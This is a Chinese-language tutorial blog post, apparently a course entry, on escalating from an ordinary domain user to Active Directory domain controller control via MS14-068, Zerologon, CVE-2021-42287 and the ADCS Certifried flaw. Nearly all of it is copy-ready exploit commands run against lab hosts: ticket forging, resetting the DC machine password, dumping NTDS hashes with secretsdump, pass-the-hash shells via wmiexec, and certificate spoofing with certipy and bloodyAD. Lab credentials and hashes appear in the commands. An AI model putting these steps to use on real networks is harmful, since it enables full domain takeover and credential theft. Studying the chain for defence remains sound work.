第106天:許可權提升-WIN 系統&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞

dummy6acker發表於2024-10-12
Go

知識點

1、WIN-域內使用者到AD域控-CVE-2014-6324
2、WIN-域內使用者到AD域控-CVE-2020-1472
3、WIN-域內使用者到AD域控-CVE-2021-42287
4、WIN-域內使用者到AD域控-CVE-2022-26923

WIN-域控提權-CVE-2014-6324

前提條件:
1、需要域環境下一臺主機普通使用者賬號密碼
2、一臺主機的管理員許可權

點選檢視程式碼 
whoami /user
net time /domain
net config workstation
ms14-068.exe -u 域成員名@域名 -p 域成員密碼 -s 域成員sid -d 域控制器地址
ms14-068.exe -u mary@god.org -p admin!@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d OWA2010CN-God.god.org
dir \\OWA2010CN-God.god.org\C$
psexec \\OWA2010CN-God.god.org cmd
CVE-2014-6324配合mimikatz拿域控主機許可權

WIN-域控提權-CVE-2020-1472

CVE-2020-1472是繼MS17010之後好用的NetLogon特權域控提權漏洞,影響Windows Server 2008R2至Windows Server 2019的多個版本系統,只要攻擊者能訪問到目標域控井且知道域控計算機名即可利用該漏洞
該漏洞不要求當前計算機在域內,也不要求當前計算機作業系統為Windows

點選檢視程式碼 
計算機名:nbtscan -v -h 192.168.3.21
漏洞檢測:python3 zerologon_tester.py OWA2010CN-GOD 192.168.3.21
重置空密碼:python3 cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21
連線後匯出:python3 secretsdump.py god.org/OWA2010CN-GOD\$@192.168.3.21 -no-pass
WMI連線反彈:python3 wmiexec.py god/administrator@192.168.3.21 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

WIN-域控提權-CVE-2021-42287

只需要域使用者賬號密碼

點選檢視程式碼 
https://github.com/WazeHell/sam-the-admin
python3 sam_the_admin.py god/'mary:admin!@#45' -dc-ip 192.168.3.21 -shell

WIN-域控提權-CVE-2022-26923

前提條件:
1、一個域內普通賬號
2、域記憶體在證書伺服器

Kali新增訪問域內資訊 /etc/hosts
192.168.1.15 xiaodi.local
192.168.1.15 xiaodi-WIN-3C7SS32SQ6R-CA
192.168.1.15 WIN-3C7SS32SQ6R.xiaodi.local

獲取CA結構名和計算機名:
certutil -config - -ping

域內資訊:
192.168.1.15
test Pass123
xiaodi-WIN-3C7SS32SQ6R-CA
WIN-3C7SS32SQ6R.xiaodi.local

申請證書:
certipy req 'xiaodi.local/test:Pass123@WIN-3C7SS32SQ6R.xiaodi.local' -ca xiaodi-WIN-3C7SS32SQ6R-CA -template User -debug

檢測證書:
certipy auth -pfx test.pfx

新增使用者:
python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.1.15 addComputer pwnmachine 'CVEPassword1234*'

設定屬性:
python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.1.15 setAttribute 'CN=pwnmachine,CN=Computers,DC=xiaodi,DC=local' dNSHostName '["WIN-3C7SS32SQ6R.xiaodi.local"]'

申請證書:
certipy req 'xiaodi.local/pwnmachine$:CVEPassword1234*@192.168.1.15' -template Machine -dc-ip 192.168.1.15 -ca xiaodi-WIN-3C7SS32SQ6R-CA

檢測證書:
certipy auth -pfx ./win-3c7ss32sq6r.pfx -dc-ip 192.168.1.15

獲取HASH:
python3 secretsdump.py 'xiaodi.local/win-3c7ss32sq6r$@WIN-3C7SS32SQ6R.xiaodi.local' -hashes :10e02bef2258ad9b239e2281a01827a4

利用HASH:
python3 wmiexec.py xiaodi.local/administrator@192.168.1.15 -hashes aad3b435b51404eeaad3b435b51404ee:e6f01fc9f2a0dc96871220f7787164bd

相關文章